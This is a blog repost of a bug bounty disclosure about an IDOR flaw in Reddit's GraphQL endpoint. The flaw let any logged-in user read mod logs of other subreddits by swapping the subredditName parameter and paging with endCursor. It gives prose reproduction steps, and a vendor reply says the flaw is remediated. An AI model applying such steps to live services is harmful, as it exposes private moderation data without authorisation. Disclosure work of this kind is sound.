Obtaining mod records using the IDOR vulnerability from any public or private subreddit | BUG BOUNTY
Glad You're Here!
Lets Unlock the secrets of Obtaining mod records using the IDOR vulnerability with our expert guides Hacking Aspirants,
I am System.Exit
What Is IDOR?
In a web application, whenever a user generates, sends, or receives a request from a server, there are some HTTP parameters such as “id”, “uid”, “pid” etc that have some unique values which the user has been assigned. An attacker can see such parameter values in cookies, headers, or wifi Packet captures. Via this, an attacker might be able to tamper with these values and this tampering may lead to IDOR.
Summary:
There's no check if the user is moderator of the particular subreddit or not while trying to access the mod logs via gql.reddit.com by using operation id. You can change the parameter subredditName to any target subreddit name which is public or restricted and get access to mod logs of that subreddit.
Steps To Reproduce:
- Log into any account as an attacker and get the authorization token
- Send request given below at gql.reddit.com
The response will look something like below
- It only gives one page of logs.Look at the response and see if the value of hasNextPage is true or false. If It's false then there are no more logs other than the ones we got
- If it's true then there are more logs and we can get them by just adding new variable after and assigning value of endCursor, which we can see in the reponse body of our request
After sending the request we'll get second page of logs. If we still get hasNextPage as true, Keep doing this untill we see hasNextPage set to false in the response. by doing this we can get all the pages of mod logs one by one.
The output will get stored in mod_log_out.txt in the same directory
Thanks for your research, @high_ping_ninja. There is an initial remediation in place, and we believe the repro steps are no longer functional.
Comments
Post a Comment